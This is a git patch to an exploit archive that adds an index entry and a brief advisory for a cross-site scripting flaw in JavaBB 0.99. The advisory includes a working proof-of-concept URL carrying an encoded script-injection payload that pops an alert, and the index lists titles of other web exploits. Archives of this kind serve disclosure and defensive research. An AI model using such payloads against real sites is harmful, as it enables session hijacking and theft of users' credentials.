From 5acc3a97137997f037b282ac3603f12c2a683d05 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 10 May 2015 05:02:35 +0000 Subject: [PATCH] DB: 2015-05-10 1 new exploits --- files.csv | 1 + platforms/java/webapps/36971.txt | 7 +++++++ 2 files changed, 8 insertions(+) create mode 100755 platforms/java/webapps/36971.txt diff --git a/files.csv b/files.csv index 191aeb594..83cf911ac 100755 --- a/files.csv +++ b/files.csv @@ -33317,6 +33317,7 @@ id,file,description,date,author,platform,type,port 36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 'id' Parameter Local File Include Vulnerability",2012-03-14,n0tch,php,webapps,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service Vulnerability",2012-03-15,Rune,windows,dos,0 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 'page2' Parameter SQL Injection Vulnerability",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 +36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 'userId' Parameter Cross Site Scripting Vulnerability",2012-03-18,sonyy,java,webapps,0 36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Include Vulnerability",2015-05-06,Vulnerability-Lab,ios,webapps,0 36925,platforms/php/webapps/36925.py,"elFinder 2 Remote Command Execution (Via File Creation) Vulnerability",2015-05-06,"TUNISIAN CYBER",php,webapps,0 36926,platforms/php/webapps/36926.txt,"LeKommerce 'id' Parameter SQL Injection Vulnerability",2012-03-08,Mazt0r,php,webapps,0 diff --git a/platforms/java/webapps/36971.txt b/platforms/java/webapps/36971.txt new file mode 100755 index 000000000..e20e4224c --- /dev/null +++ b/platforms/java/webapps/36971.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/52545/info + +JavaBB is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/pm.externalSend.jbb?userId=42888&username=teapro%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file